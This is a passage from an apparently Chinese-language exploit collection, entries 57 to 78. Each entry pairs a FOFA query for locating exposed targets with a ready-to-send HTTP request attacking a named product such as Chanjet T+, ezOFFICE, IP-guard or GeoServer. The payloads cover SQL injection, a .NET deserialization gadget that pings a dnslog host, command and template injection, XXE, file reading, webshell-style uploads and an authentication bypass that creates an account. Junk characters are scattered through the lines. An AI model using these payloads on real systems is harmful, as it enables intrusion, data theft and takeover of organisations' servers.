4 Y0 `: u' J/ g U4 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
( k2 h9 P8 Z5 d# W# _Content-Type: application/json
9 d! S$ Z9 ]: q& m x1 V
1 n, n1 a1 u- I% E1 s. y! O{
' H2 P( K3 ?! ?: v* o2 V7 U9 M8 | "storeID":{2 g2 {& |: E u2 g2 e+ |
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 |% R( ]# O, g "MethodName":"Start",. H$ V! } L2 L$ m
"ObjectInstance":{
( J1 x) u' i) S "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& g, V" r8 H9 H/ V
"StartInfo": {
: T2 q/ q( D+ p! p$ ~ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& N i+ D. _; k- B
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw" \: q( I( L" L8 {$ p
}; T' K5 P! D& ?
}
+ g; w8 c/ y# ^& j$ `4 `9 m$ i }
3 [2 p/ }# Y K8 a( R5 N}
0 L' D) T R7 |$ q
- F4 s# j# e6 O/ m) j0 u+ ]! ?) k! ]+ K; G. K( d( O! f& j
57. 畅捷通T+ keyEdit.aspx SQL注入
& v5 G/ s' z- W+ I0 Q0 @FOFA:app="畅捷通-TPlus" t$ E3 H5 q" O2 `! C3 Z
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.13 P5 M) S( J. C# ?6 y6 s
Host: host
3 d7 {# R0 u* L9 g! IUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 _5 H) H n- t; R! \8 @
Accept-Charset: utf-8
7 l x" \* l$ ]: p$ O; j' w# wAccept-Encoding: gzip, deflate
/ i. Z4 T" }2 K6 oConnection: close
( [: s9 e8 g! V9 `' O' g
3 \: k/ b. F) I7 z
, h& f# U2 |. i" A58. 畅捷通T+ KeyInfoList.aspx sql注入; ` q- I' o; ?9 j9 S- R
FOFA:app="畅捷通-TPlus"
( y/ ~4 \* d3 B- C$ t$ PGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1: q& A# V2 _: X1 ?; [
Host: your-ip
! a7 g2 H3 m0 LUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ w+ A6 V3 A: s( c- T- @3 |% tAccept-Charset: utf-8% ]0 A' Q# M( G( e, w# u
Accept-Encoding: gzip, deflate* E, Y9 ~% I$ X6 Q t% t* o
Connection: close; Y2 l3 c- E; X* P* d
5 Y8 t7 u" Q2 K* @) u, y' F4 y c0 @7 F
0 ?; d& l; L* m) t+ @0 u59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! f) G9 r" ], e1 K1 ~% L4 |- XFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"$ M: |/ a. K9 _& P$ w# a8 X# t
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
# h- O, T* T5 Z; tHost: 192.168.86.128:9090
, F" x* W1 w$ U/ _ A! Y6 k& ~* b. ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 k% V' X, z2 E, E0 f8 fConnection: close
, d# ~% Q6 ]' A) z7 {6 IContent-Length: 1669* ^. K8 |8 s' d" U1 |, e
Accept: */*
7 }3 L) _; z! V( |1 _2 x" R$ KAccept-Language: en
" C; O; h- F- U$ ]! x+ [. @! W' ?Content-Type: application/x-www-form-urlencoded2 ?) A- f3 H, E2 ]: a+ \7 E, M
Accept-Encoding: gzip
! u2 M) S6 w2 b& b
( ], y* }, y, E2 \6 ]PAYLOAD& d" ~# T, v% N0 I7 v& n
M; X# T9 w% v' l, v, R* \6 b
6 p3 u o& R7 U60. 百卓Smart管理平台 importexport.php SQL注入% C" \3 {# l7 l0 |5 U, U- \
FOFA:title="Smart管理平台"
7 x. n' G* ?- U8 @ t5 HGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1; V4 H, Y; ^' H& n
Host:0 t. ~4 e# q( y& F! g. t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. [9 n2 Y- T6 }$ Y+ q1 `+ S! z$ D! M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ y( g! r/ I- n$ wAccept-Encoding: gzip, deflate
2 z( a+ n7 ?% R0 ]Accept-Language: zh-CN,zh;q=0.9) p5 L+ Q& X9 B8 U5 |
Connection: close
1 t7 a! O0 V" c' n% ~: Z3 q
, Q# a. a: x/ t; A1 L. I) k+ q
. t7 Q( S& I# P {% Y+ ^" |61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& n7 a# i; r) g# N3 S7 pFOFA: title="欢迎使用浙大恩特客户资源管理系统". R& L G. O" g6 r4 N
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
+ s8 E# s o9 A; cHost: x.x.x.x: A7 r- ^1 F1 [6 l8 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) z9 `6 D0 \7 S0 D
Connection: close
) H. ~; v5 O5 h; H4 mContent-Length: 27
. z& a' S% }1 Z/ b JAccept: */*: q. C: q5 e) V r3 n1 i
Accept-Encoding: gzip, deflate+ E: l9 E3 t0 U7 P; j- `* n
Accept-Language: en
; @# C6 n5 \- g9 x& E2 QContent-Type: application/x-www-form-urlencoded
" v( q5 s: J2 O9 E8 d, H9 u" l- w& n$ Q: X& Z% U
8uxssX66eqrqtKObcVa0kid98xa9 L+ @ w }3 y( C6 o, M, J
' h% s5 E# [ n$ }0 s. z- ?; @5 r6 k3 k% \$ ?% w# }* h
62. IP-guard WebServer 远程命令执行; I# \ N, n8 h2 v z
FOFA:"IP-guard" && icon_hash="2030860561"
/ _% G( Q4 e8 ~& ^. ?- G: q% xGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 T. B, ~! m* Y% U6 {
Host: x.x.x.x
i1 T5 v$ x' [User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36% h5 v d# H6 D
Connection: close
1 q: N9 T3 G& Z4 g5 ~Accept: */*+ N- J) H. l' f( w
Accept-Language: en
& o/ [" i- o7 D1 W+ z$ X/ hAccept-Encoding: gzip
# r4 C' p; S0 F0 M2 R6 c" h8 d1 A/ F7 N6 T3 W! N8 E
+ G; T5 q& P$ p访问+ \/ _! h# e% F) D6 V% s
2 b% W8 \8 S" Q/ b# ^# S D1 T
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
5 ~, S5 G5 G% R/ J2 |Host: x.x.x.x
, v/ y" p* S; H/ q6 ], y/ g* T# @9 z# D
. M: f! N$ j+ g
63. IP-guard WebServer任意文件读取2 l6 v' | J6 E7 d h& I# o. ]
IP-guard < 4.82.0609.0
2 q& ]* N& m7 h1 ?& gFOFA:icon_hash="2030860561"% m, d! l9 p: y- y" x
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 M R* j/ K% FHost: your-ip( G, q R1 V5 l) G0 [ D* [( q5 @9 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ Q- e! J x. [, `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 n6 Y0 J* e0 |; F) i* l' NAccept-Encoding: gzip, deflate
2 J% b) G' w3 L. K( Y% @ [: KAccept-Language: zh-CN,zh;q=0.9
. F# w9 s2 G4 ^% h4 cConnection: close4 D. n5 y! _: P: N/ n3 U! p
Content-Type: application/x-www-form-urlencoded
7 z/ E" G' l( s. H2 a+ n
+ k1 I6 Q1 m$ q; B8 npath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
, y( y2 i' {5 ~# G( ]4 d& m1 {7 }. p0 t! W* ]
64. 捷诚管理信息系统CWSFinanceCommon SQL注入7 g8 }# ]) b# ~6 R# j
FOFA:body="/Scripts/EnjoyMsg.js"
' Z; v/ `, _7 U0 ePOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1, \( c) \1 j- U. ]+ W5 l5 R
Host: 192.168.86.128:9001
2 A6 C+ k' g2 y$ d0 zUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.362 g7 e1 y8 K5 Y. Y( \ r
Connection: close
5 l2 c! N$ |! C8 B: w: |6 MContent-Length: 369
' ~2 |$ @; q: O" rAccept: */*; `* H H) p1 _
Accept-Language: en
, m2 P' e0 X. f, }Content-Type: text/xml; charset=utf-8
0 q. k. F" F! `* t; L& iAccept-Encoding: gzip7 t+ S8 {8 U( e
( F- e" E7 q9 ]! l+ {% c3 b<?xml version="1.0" encoding="utf-8"?>* X5 J3 ]8 R: @( F5 q. T
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 c! O X) a2 z7 J- X
<soap:Body>: X, J: B8 a* M# _& O
<GetOSpById xmlns="http://tempuri.org/">+ m; ~" T9 Z" X0 Q# W4 d' x
<sId>1';waitfor delay '0:0:5'--+</sId>
; b8 |7 B. ~9 D& { </GetOSpById>
- i7 E3 D. b( L! `( m </soap:Body>
" d& `! Z `/ O4 `4 Z</soap:Envelope>% G& \ j" h" m1 P1 d2 L5 i. w" J
( @1 o% v; w C& E
) e% b! g8 @, k* o0 ~& R! s65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
% w4 l: w! n2 d0 P( @FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# w5 F6 O9 v' N: z响应200即成功创建账号test123456/123456
1 ~" f# u8 ]7 P l3 ?POST /SystemMng.ashx HTTP/1.1! M6 o9 G* x5 v+ P; S4 Z! z
Host:
9 b) y/ ~* \, L" aUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
9 V" a! n# w3 {Accept-Encoding: gzip, deflate* g( i) x$ y& n0 c
Accept: */*
# ~$ K% L/ U! fConnection: close
4 `8 c8 v% Q# o+ \9 R7 ]Accept-Language: en
$ j" J8 R4 _0 O2 z$ j4 sContent-Length: 174
3 o& g1 _8 F; [/ a) O3 n5 U( f- U1 c9 I {/ a, Z
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators& s9 }2 B: [, _8 A
3 V' o3 }' k, P- T9 |6 H s' W/ e
7 f+ t# G5 E- u8 G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; }) F! n* N( d" Z5 p* d9 H% tFOFA:app="万户ezOFFICE协同管理平台"
' { d' g2 q+ A, Z( U* S/ g/ f( Q- d! y* r. D# q' I: ^
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
. K( \' s0 F0 g& w( SHost: x.x.x.x8 Q) X: Q7 j1 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 Z; R, y; N: C
Connection: close) n' Z/ X5 Y- G( g
Accept: */*+ P( `8 N0 R0 \
Accept-Language: en0 _9 c ^. l6 A
Accept-Encoding: gzip8 l3 M, r7 {( |
- z0 u8 z, Y5 u6 X' H9 B( ]. p
* K, A& C4 U/ M: y9 M第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
! U- `# t5 @% v5 T( K. {) s
# ^. d; g/ h& D; O3 q% e& n h8 p67. 万户ezOFFICE wpsservlet任意文件上传
. z# K7 x) {4 g- J3 \FOFA:app="万户网络-ezOFFICE"5 a) p/ L3 _" P& G# e) D% d
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
) [8 N% Z/ x9 ^* lPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
/ Q) c' i/ ]0 U! m0 `Host: x.x.x.x4 W7 t+ c1 m( m, t2 w+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0. x' i$ z% _/ K1 B* @4 S
Content-Length: 173
3 S0 a4 b0 a% g7 `* GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8! A6 E, d Y4 \, |; r* p/ s. U2 ?
Accept-Encoding: gzip, deflate
* u O7 }5 k: P# d QAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.35 o# s- r; V, E' o) ` W
Connection: close/ t1 _" {1 f i
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp0 q# p9 J& u( q! r' D: B6 Q
DNT: 1, U/ V$ {0 n7 v
Upgrade-Insecure-Requests: 1
, R* F- E8 e: X! ]1 c Y# R$ E) L4 n( x2 U4 O
--ufuadpxathqvxfqnuyuqaozvseiueerp
- E. y, X3 X: B; q$ [Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"5 q/ y. s2 D7 \; S' w& j! ?0 o" D3 o
" q. z4 Y! ^' m% H/ G
<% out.print("sasdfghjkj");%>
) F- M/ y/ F& ^; j5 Q# p- c--ufuadpxathqvxfqnuyuqaozvseiueerp--; W" M% W8 H1 E T3 d2 Z$ [- m
: Y( [; D3 o1 c. k4 B% N7 H
9 @8 {0 r+ o& [2 X文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
$ V2 E* V+ Z5 M
N5 L& O8 J; [" A5 }+ q7 ?68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 |; J3 G6 n2 i7 {FOFA:app="万户ezOFFICE协同管理平台"
& q- d- o: d+ J1 Z* O7 Y% t9 Z; \GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, y8 {" ? l# R1 w* S
Host: {{host}}! J$ ^' K. E- Z c) V& U- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.364 V# _1 F2 z' V2 Y4 ]( S# k
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.84 D9 n$ `3 u' g, h
Accept-Encoding: gzip, deflate$ ]. x- O0 I% d
Accept-Language: zh-CN,zh;q=0.9
% [5 X. Q/ Q _# @Connection: close, i t$ x0 d# v {; N2 |! {. m
6 d' v7 b; E0 `. |3 Q; R
8 Z! m5 C k- a69. 万户 ezOFFICE contract_gd.jsp SQL注入/ ?+ q( M+ |5 n
FOFA:app="万户ezOFFICE协同管理平台"
- [) u: i. s4 m7 vGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1) ?3 }- t5 j/ C* D% j* y
Host: your-ip( Y$ w, n# R M0 b, n
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, R t( D% Z$ I3 X/ kAccept-Encoding: gzip, deflate6 z# Y7 i) D+ ~9 z# A* |, p9 q
Accept: */*. {5 Q# m; N* t, A
Connection: keep-alive! L& d; T A, V/ }
' m3 _; t- ^* `; f) `8 |/ b
! u" E* L0 [8 L: N( q) A; L, c70. 万户ezEIP success 命令执行
" n+ T, ^; t5 S+ n; K, IFOFA:app="万户网络-ezEIP"
) {2 s5 D I& s$ ePOST /member/success.aspx HTTP/1.1
7 h5 n1 Y# W$ y- N. i) `Host: {{Hostname}}
9 E" n& R0 t6 c* w8 X# [; @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 v# q6 F' z. g/ {' T/ @) tSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ U6 s# Z( C0 X( AContent-Type: application/x-www-form-urlencoded
( _" r% E: u/ F4 ^TYPE: C
* S* h, X( J- i7 W5 M3 ]: R! C7 kContent-Length: 16702, ?: M+ t& ]5 U5 o0 X
* m) z. I4 ^, [- a6 c+ T__VIEWSTATE=PAYLOAD
$ E+ \0 F4 d1 q5 ?( G' ]
0 b: o2 t! ^) h6 b3 V5 e$ f5 k; u. e2 K. Z' y) w
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
% n9 q/ ]$ O, r4 v0 z# h+ qFOFA:body="PM2项目管理系统BS版增强工具.zip"5 n$ s" s% X. ~" t# A( A
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
$ M5 i& m, V: E0 A+ O, iHost: x.x.x.xx.x.x.x
( f4 ?+ W) Z$ \9 yUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 e2 Z3 ~* J7 y" O5 f0 `6 U/ H
Connection: close
* ]+ f9 C! _# M$ `. u( f! }7 p4 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 S0 ?3 f% X) v' m8 g$ n+ m1 B
Accept-Encoding: gzip, deflate
7 U2 r0 E; l! X# QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( l2 F. Q( k, [& [: P7 jUpgrade-Insecure-Requests: 1
- V3 \0 u$ [7 N: A% m9 d; y# l4 E; ^: G0 n( G3 L5 }4 z
# u8 `* v* r. \& H0 b2 B
72. 致远OA getAjaxDataServlet XXE( ~6 n; t/ m/ m# _, H% M% r$ |
FOFA:app="致远互联-OA": i+ Y; l; z- ]1 Z5 T( U2 V
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
6 R- Z6 x" d% p3 o9 i# ?4 ^Host: 192.168.40.131:8099( B# t9 `; z: o. d* l2 F
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) g" z. U5 `( d/ D5 j
Connection: close
4 ^# g, {0 a& e' SContent-Length: 583, }. B8 Z: Q& F: J- I S9 l' S
Content-Type: application/x-www-form-urlencoded
! h( t; M: L! O- y2 i3 TAccept-Encoding: gzip
) O- c( Y1 e# X
% o) S- s$ s, K: R7 Q) s$ R8 G1 y2 wS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E: ~, D# t; n" o9 B! M% V/ k
, r" J* n6 O# y# R7 z7 a
# i$ p+ l) v5 [4 B5 ]73. GeoServer wms远程代码执行
8 s% y( z- ?" U# a4 E; a9 jFOFA:icon_hash=”97540678”! O1 d7 j. b1 ], H% ^7 E
POST /geoserver/wms HTTP/1.1
9 r* n2 O0 }7 G4 v9 x ]Host:' n& a& \/ K! ?+ e. C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) }* Q" @) i# i; y" Q' A0 d7 {
Content-Length: 19810 |$ ]! [5 k# o; p" E
Accept-Encoding: gzip, deflate+ J6 S0 G. c8 y, L- S
Connection: close; d9 a: o! f6 E* i9 l' h1 p
Content-Type: application/xml
) E. M1 O, o( D- `* GSL-CE-SUID: 39 \& A. e& m7 |; N2 ?& D% u
0 t2 V f* t( L
PAYLOAD
1 y$ V" ]& o9 p$ O; \/ J' y/ L5 v: M3 Q+ i ]' E5 Q
9 D& S0 n) i* W* h74. 致远M3-server 6_1sp1 反序列化RCE5 c/ R# \, v* i6 Z: s2 F; f1 ^
FOFA:title="M3-Server"
; K( V2 X" h' M9 \, f8 `% MPAYLOAD* O/ {6 k! n" P% P. R4 l
4 m4 Y1 V2 k/ P4 [75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
# _2 r; V/ ?* l, y6 S2 l# ~FOFA:app="TELESQUARE-TLR-2005KSH" j* t& F7 {" `# H5 S
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
+ ^% O% _9 o9 K/ ^$ HHost: x.x.x.x
& ]5 f( S! |3 ?/ t5 T1 l% hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# z- T6 ?6 E5 W& T6 x2 @& Y
Connection: close
) w% t$ B8 n4 O* g0 T( bAccept: */*$ v8 I$ ~2 h- ]9 ^. h$ @+ j+ K% C3 l
Accept-Language: en
) g- m' Z( e" c! aAccept-Encoding: gzip
2 o: T1 q" I( V4 g. [9 u7 r& F2 a' }$ {9 J
" @4 l; k) s. r& K, v, u
GET /cgi-bin/test28256.txt HTTP/1.1* D9 K0 f- @# y7 }2 \0 ?
Host: x.x.x.x
. G/ D8 B' B) |& t* L
$ w' Z5 S" d/ ]: D2 @! Y, U
& J, H: h6 J+ [! r; S76. 新开普掌上校园服务管理平台service.action远程命令执行% e1 e& a3 |' f9 |, q, K: K
FOFA:title="掌上校园服务管理平台"+ ?, }) n) M+ |+ u# h, f
POST /service_transport/service.action HTTP/1.14 y$ g; Z; S5 s5 m- l
Host: x.x.x.x
`8 D; U1 l6 \) i8 G- P& jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0) f; q+ |+ H# d. Z9 V
Connection: close5 k6 G$ L# B7 r
Content-Length: 2115 A6 H! R0 W" ^7 g/ a* v# m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; v* |* B6 P8 S" s1 AAccept-Encoding: gzip, deflate
! {: g9 F& b, _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. n8 q# F S+ ~1 { V+ \7 J: A
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4# T0 H. O- z/ H0 Z7 e$ o% Q
Upgrade-Insecure-Requests: 1
" h" u( w) T Z+ O: { r9 S
# H' D M; ?( x! w( b# U D X; ~{" |! h9 ]& p m% w6 A
"command": "GetFZinfo",
* y" ^( k) O/ h' P "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\") j7 h1 F7 ^! n7 Y. W2 m' a
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"+ u% A, w# H2 ^% T
}
# T" p7 y2 X/ T& n, O+ r
8 y+ }0 C4 {2 m' J# M
7 s8 y9 d6 ^7 l# e+ F3 MGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1, N; \& N1 @6 l1 d
Host: x.x.x.x
! C! V- i% ~: s O. Q* w3 m1 I' ~1 T
1 A# j" H" A9 x: z) ] Z, T0 s- ^8 i, x! u! v+ x. X" W! ~( o
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
3 |$ i8 q% m5 v0 m4 xFOFA:body="F22WEB登陆"
! j& |. e5 Q' d5 u+ YPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1/ \9 x# a( S4 h2 u# p$ m
Host: x.x.x.x" F7 U) y& b8 l0 m ^) S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.365 ~! {' k$ B1 o }2 U
Connection: close4 W) K& l8 O+ q9 K" ~2 \) | v
Content-Length: 433
7 F. Y7 l+ _- L9 A6 F, dAccept: */*8 L0 G. f9 t3 X1 [% _3 r
Accept-Encoding: gzip, deflate
) n5 r+ w* V& ` Q4 A, fAccept-Language: zh-CN,zh;q=0.9
; B4 `! B% F; vContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix( E4 c# G# m! ]1 g% a% ]$ X7 j
3 b9 @( g4 {2 S: ]4 U2 D. K------------398jnjVTTlDVXHlE7yYnfwBoix
: d& Z# l$ g1 W$ m; W) c: TContent-Disposition: form-data; name="folder") k3 V6 }& J, m+ J8 o4 a5 K
5 c$ Y# a* z3 q5 V; z* D6 Y! U
/upload/udplog
5 w2 C, j: c b. i+ L' E------------398jnjVTTlDVXHlE7yYnfwBoix1 u- ~- O9 R( h5 W4 e
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"/ @2 O8 X5 w* T" q8 j. @! X
Content-Type: application/octet-stream
& \& E' Z" M/ W* h3 S2 _6 ~6 B, r3 I# ^! u F7 V" a% U
hello12345670 Z9 r- ~/ M1 U% _* N/ D
------------398jnjVTTlDVXHlE7yYnfwBoix. B$ ?0 o, H6 X1 a4 w
Content-Disposition: form-data; name="Upload"
7 E/ u! u& M( k0 F7 k
' T; v! h f; u# k# V. ?9 OSubmit Query% _( D7 E# [8 O7 j4 w
------------398jnjVTTlDVXHlE7yYnfwBoix--
& { v, R7 L, s1 R' I/ l" P6 v" M& N3 L, H! |
4 C: ]! Z; F0 ~! K
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) b G7 Q& i$ n" ]& h7 n' Z
FOFA:icon_hash="2001627082"
]) `" ], j9 w. V+ D. A+ p5 NPOST /Platform/System/FileUpload.ashx HTTP/1.1
) \ ~; m" x1 p- q! D$ ]) @Host: x.x.x.x* s1 b+ g# a. }7 x* S! T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 Q* N9 e3 H1 w3 I8 O6 c
Connection: close
7 `) ^7 L4 A; @# f# RContent-Length: 336: g2 ^/ o- B# O0 q' f- u- v
Accept-Encoding: gzip4 U7 \2 F) o3 l
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l7 } c* e. }* x5 E. D
& _' }. } |6 U/ }------YsOxWxSvj1KyZow1PTsh98fdu6l. K6 o3 n3 ^7 E! Z2 r/ J; f
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
- }7 X' k$ `" b2 Y, qContent-Type: image/png- i- m* g2 U5 m! J/ }4 z4 x
) h# f7 }. Y! s6 I9 |9 k# N$ e
YsOxWxSvj1KyZow1PTsh98fdu6l" _) @# V; S* Q3 n
------YsOxWxSvj1KyZow1PTsh98fdu6l( Q+ k9 M& u# E( r" g' M/ D
Content-Disposition: form-data; name="target"2 n% r2 e( x, u) ? G: x5 m V3 Z
+ z0 S# X. r0 h2 ^, s. e7 l
/Applications/SkillDevelopAndEHS/2 ]& Z( j: C0 r3 i
------YsOxWxSvj1KyZow1PTsh98fdu6l--# P+ T% y: S% k. h
! q% R1 U! ?5 [; [! `5 p! D+ o
